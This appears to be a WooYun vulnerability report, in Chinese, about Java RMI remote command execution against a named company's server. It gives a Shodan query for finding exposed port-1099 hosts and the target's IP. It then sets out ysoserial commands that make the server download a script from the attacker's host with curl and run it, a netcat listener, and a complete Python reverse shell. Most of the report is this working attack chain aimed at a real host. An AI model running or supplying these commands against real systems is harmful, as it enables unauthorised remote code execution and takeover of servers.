河南阿拉法软件科技有限公司某站java RMI远程命令执行

看到http://zone.wooyun.org/content/25478，所以准备找个实例验证一下，并提交到主站上面。

1、搜索搜索可能存在该问题的主机，这里搜索中国、端口1099并且是linux主机的服务器，搜索如下

https://www.shodan.io/search?query=port%3A%221099%22+country%3A%22CN%22+os%3A%22Linux+3.x%22

结果如下（如果其他同学要验证该漏洞的话，请不要损坏删除泄露信息等）

2、根据爱上平顶山提供的方法。首先找一台外网IP的服务器，操作如下

nc -lvp 23333

此时在监听端口

3、根据zone的信息，执行两步命令（Java RMI远程命令执行）

java -cp ysoserial-0.0.3-all.jar ysoserial.exploit.RMIRegistryExploit 101.200.121.155 1099  CommonsCollections1 "curl -o /tmp/atest.py 111.111.111.111/b.py"

111.111.111.111为自己独立IP

这一步主要为

curl -o /tmp/atest.py 111.111.111.111/b.py

下载111.111.111.111的b.py文件到本地服务器，并存在/tmp 下 命名为atest.py

【忽视报错，这个命令可以在任意主机上运行】

4、第二步

java -cp ysoserial-0.0.3-all.jar ysoserial.exploit.RMIRegistryExploit 101.200.121.155 1099  CommonsCollections1 "python /tmp/atest.py"

主要为python /tmp/atest.py

其实就是一个反弹shell

参考http://zone.wooyun.org/content/5064

【忽视报错】

5、成功后，独立服务器上的监听会成功，如下图

这个试试就说明成功命令执行了。

python脚本

import socket,subprocess,os
 s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
 s.connect(("111.111.111.111",23333));os.dup2(s.fileno(),0)
 os.dup2(s.fileno(),1); os.dup2(s.fileno(),2)
 p=subprocess.call(["/bin/sh","-i"])

其中111.111.111.111为自己独立服务器IP。

证明如下，

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：20 (WooYun评价)